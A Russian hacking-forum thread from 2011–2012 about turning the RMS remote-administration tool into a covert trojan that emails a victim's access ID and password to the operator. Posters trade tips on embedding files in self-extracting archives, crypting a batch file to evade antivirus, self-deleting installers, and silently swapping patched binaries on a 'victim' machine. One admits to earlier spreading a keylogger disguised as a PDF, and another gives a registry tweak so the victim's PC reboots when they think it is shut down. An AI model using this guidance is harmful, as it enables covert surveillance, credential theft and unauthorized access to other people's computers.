RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. TDI
    TDI Новичок
    Симпатии:
    32
    в експресс сборке hitch.exe не является SFX архивом

6 фев 2012
  2. vkodm
    vkodm Новичок
    Симпатии:
    0
    Так оно и есть. Но экспресс сборка в соседней теме.

6 фев 2012
  3. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    Извините за крайне нубский вопрос но как помещать файлы внутрь exe шников? Винрар отказывается работать с ними а 7z все время ошибки выдает.

6 фев 2012
  4. vkodm
    vkodm Новичок
    Симпатии:
    0
    Открой 7z. Для удобства Вид -> 2 панельки. И exe который выбрал правой кнопкой мышки - открыть внутри (если снаружи - запустишь файл). Все. Теперь можешь копировать, вставлять, что позволено (бат, тхт) - редактировать.

6 фев 2012
  5. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    Именно это и не работаеь

6 фев 2012
  6. vkodm
    vkodm Новичок
    Симпатии:
    0
    Что именно? Не все ЕХЕ можно открыть. Нет 2 панелек? Что? Или редактировать БАТник не дает? Может файл сейчас используется...

6 фев 2012
  7. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    вы не поверите, но все заработало! не мог вставить файл в exe-шник(тупо при переносе какая-то ошибка вылетала). Вчера. Сегодня попробовал и внезапно смог! ехууу!!

6 фев 2012
  8. TDI
    TDI Новичок
    Симпатии:
    32
    через 7з вставлял?)
    он у меня тож ошибку выдавал:)

6 фев 2012
  9. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    хмм тут такая проблема. повторюсь, но нод 32 ругается на батник. причем батник в закриптованном состоянии(правда наверное криптор уг). и еще. я отключил антивирь, у меня перестал палится батник, НО у меня по окончании работы сетапа вылезает stop.js открытый в блокноте! /facepalm
    как решить?

Последнее редактирование: 7 фев 2012
    7 фев 2012
  10. TDI
    TDI Новичок
    Симпатии:
    32
    уже кто-то писал про это, stop.js нужен вроде для самоудаления, попробуй без него запустить

7 фев 2012
  11. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    О блиин я вспомнил! Я же месяц назад уже впаривал кейлогер в sfx архиве который по завершении тихой установки открывал pdf-ку и антивири (в том числе и нод) это дело не палили! Пойду проверю мб и здесь сработает.
    З.ы. Делал через комменты. Точнее даже через опции лол.

7 фев 2012
  12. wald78
    wald78 Новичок
    Симпатии:
    1
    у кого то сохранились эти файлы, выложите плиз еще раз! а то megaupload прикрыли походу :thx:

7 фев 2012
  13. IceBolt
    IceBolt Новичок
    Симпатии:
    1
    Вот они:Патчи для версий 5.0 и 5.1
    Pass:xaker.name
    5.0 версия после патча-баннера нет,но видео не получалось захватить нигде,только звук,а пропатчив 5.1b3-получилось полностью работоспособная сборка с видео и звуком без баннеров(проверено на 3 ноутах),задержек никаких,всё нормально как обычно работает.

PS:После установки и коннекта к удалённой машине-через файлменеджер переименовываем оба файла(например rutserv1.exe и rfusclient1.exe)затем копируем туда же патченные файлы.Либо делаем рестарт компа,либо,что менее паливно,просто в следующий раз после "естественной" перезагрузки :) получаем пропатченную удалённую машину.
    Переименованные файлы можно удалить через файлменеджер.
    (В версии 5.1b3 файлы находятся в директории:C:\Program Files\Remote Manipulator System - Server)

7 фев 2012
  14. slayder
    slayder Новичок
    Симпатии:
    0
    Нашёл в реестре весьма полезную функцию)) мб кому нить интересно будет. В общем заходим в HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Shutdown и для параметра FastReboot ставим значение 1. После этого при нажатии пуск -> завершение работы, выключить -> ПК не выключается а перезагружается)) В общем выключить его можно будет только кнопкой на системнике или из разетки))). Можно в батнике этот код прописать.. А так жертва думает что выключает пк и уходит а на самом деле пк перезагружается и есть очень много времени полазить в нём, думаю к этой теме это подойдёт)

8 фев 2012
  15. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    deleted

Последнее редактирование: 8 фев 2012
    8 фев 2012
  16. edonkey
    edonkey Новичок
    Симпатии:
    0
    а как ты конфигурируешь сервер? через него самого установив не могу, потому что сервер сразу уходит в скрытый режим после установки, а по этой методе не получаеться потому что не активны в конфигураторе пункты : не запрашивать подтверждение и настройка запуска
    если не сложно скинь нормально работающий 5.1beta3 сервер, пакет которого не сконфигурирован прятать свои папки и концы из трея

8 фев 2012
  17. IceBolt
    IceBolt Новичок
    Симпатии:
    1
    Вот с 36 страницы,читайте внимательно....
    Тыц на пост 359
    Включаете отображение защищённых системных папок и файлов в параметрах папок в панели управления и скрытого режима у вас больше нет)))

8 фев 2012
  18. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    народ, слушайте. я теперь знаю как делать абсолютно непалящиеся sfx архивы, которые еще и самоудаляются. Мне написать как это делать? А то у меня на батник например антивирь ругается.

9 фев 2012
  19. TDI
    TDI Новичок
    Симпатии:
    32
    можеш росписать

9 фев 2012
  20. slayder
    slayder Новичок
    Симпатии:
    0
    Megatron13 ждём..